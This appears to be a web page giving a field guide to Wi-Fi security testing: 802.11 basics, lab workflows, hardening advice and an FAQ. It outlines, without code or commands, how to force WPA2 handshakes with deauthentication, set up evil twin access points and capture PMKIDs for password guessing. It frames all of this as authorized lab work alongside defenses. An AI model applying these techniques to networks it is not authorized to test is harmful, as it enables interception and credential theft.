Wi-Fi

Wi-Fi at 2.4/5/6 GHz connects nearly everything. This page gives a concise field guide: signal basics, common research workflows (in a lab), defenses, FAQs, and devices that excel at Wi-Fi testing.

Quick-start checklist

Permission & scope: Only test networks you own or have explicit written authorization to assess.
Define goals: Recon only? Lab capture of handshakes? Evil Twin UX testing? Keep it scoped and safe.
Pick band & channels: 2.4 GHz (crowded, long range), 5 GHz (cleaner), 6 GHz (Wi-Fi 6E; reduced legacy noise).
Tooling ready: One recon/sniffer radio + (optionally) a second for AP/attack simulations in a lab.
Keep logs: Timestamp captures, channel plan, clients seen, AP capabilities; screenshot interesting frames.

Wi-Fi primer (bands, frames, auth)

Wi-Fi is IEEE 802.11. Devices exchange management frames (beacons, probe req/resp, auth/assoc), control frames (RTS/CTS/ACK), and data frames (payload). Security layers (WPA2/WPA3) live above association.

Bands & channels: 2.4 GHz (1–14), 5 GHz (36–165), 6 GHz (low/high 6E ranges). Channel width affects throughput and interference—don’t over-bond in noisy environments.

Association precedes encryption; the 4-way handshake derives session keys for WPA2/WPA3-SAE.

Common research workflows

1) Recon & channel planning (passive)

Scan bands to inventory APs, SSIDs (open/secured/hidden), and clients; record RSSI and capabilities (11n/ac/ax; WPA versions).
Note channel utilization, overlapping APs, and non-Wi-Fi interferers; identify candidate lab channels.

2) Handshake capture (lab)

For WPA2-PSK: passively wait for client re-assoc, or in a lab, trigger deauth on your own client to force a new 4-way handshake.
Validate capture by checking MICs and replay counters; store PCAPs with metadata (SSID, channel, time).

3) Evil Twin / captive portal UX testing (lab)

Clone SSID/BSSID/channel in an isolated lab. Present a portal for awareness training or UX resilience testing.
Measure client behavior: auto-join? certificate warnings? HSTS blocks? Only perform on your test clients.

4) PMKID capture (WPA2-PSK, lab)

In certain setups, capture PMKIDs from the AP without client interaction. Lab-only and with authorization.

5) 6 GHz & WPA3-SAE behavior

Test client/AP compatibility, transition modes, and roaming. Validate protected management frames (PMF) policies.

Ethics: Deauth, Evil Twin, and credential harvesting must be performed in a controlled lab or explicit engagement scope. Do not touch networks you don’t own or control.

WPA2/WPA3 lab notes

WPA2-PSK: 4-way handshake produces PTK; captures can be used to verify password strength (on test networks only).
WPA3-SAE: Uses Dragonfly handshake; offline guessing is harder. Verify correct SAE groups and PMF enforcement.
Enterprise (802.1X/EAP): Focus on certificate validation, EAP method choice, server config, client profiles, and downgrade resistance.
PMF (802.11w): Mitigates some management-frame abuse. Ensure “required” on sensitive SSIDs when clients permit.

Blue-team & hardening

Strong auth: Prefer WPA3-SAE (or 802.1X) with PMF=required where client base supports it.
RF hygiene: Plan non-overlapping channels; right-size channel widths; avoid excessive transmit power that bleeds beyond premises.
Rogue AP detection: Monitor for BSSID/SSID spoofing, sudden deauth patterns, or unexpected 6 GHz beacons.
Client policy: Disable auto-join to open networks; enforce cert pinning on enterprise; use DNS filtering and HSTS everywhere.
Segmentation: Separate guest/IoT from corporate; egress controls; rate-limit onboarding portals.
Keys & rotation: Strong PSKs or, better, per-user creds (EAP-TLS); rotate PSKs after personnel/device changes.

Troubleshooting

Can’t capture anything? Verify you’re tuned to the right channel/band and in monitor mode; check regulatory domain settings.
Missing handshakes: Clients may not be roaming; in a lab, reconnect a test client. Ensure clock sync and correct capture filters.
Portal not showing: Modern OSs cache captive portal states; clear or use fresh test clients/browsers.
6 GHz visibility: Ensure adapter/AP support 6E; some OSs hide 6 GHz SSIDs without proper country codes.

FAQ

Is deauth illegal?

Unauthorized interference is illegal in many jurisdictions. Only perform deauth in a controlled lab or authorized engagement with written permission.

Do I need special adapters?

For monitor/injection you need chipsets/firmware that support it. Many testers keep a known-good 2.4/5 GHz adapter and a separate 6E-capable one.

Is WPA3 unbreakable?

WPA3 improves resilience but misconfigurations and weak passwords still create risk. Defense-in-depth beats any single control.

Devices for Wi-Fi

Useful references

802.11 standards overview; WPA2/WPA3 specs and implementation guides
Capture/analysis tools: Wireshark, Kismet, Aircrack-ng suite, hcxtools
AP design guides for 6 GHz and high-density deployments
Rogue AP detection & WIPS best practices

Legal & ethics: See Ethics for permission boundaries and safe lab practices.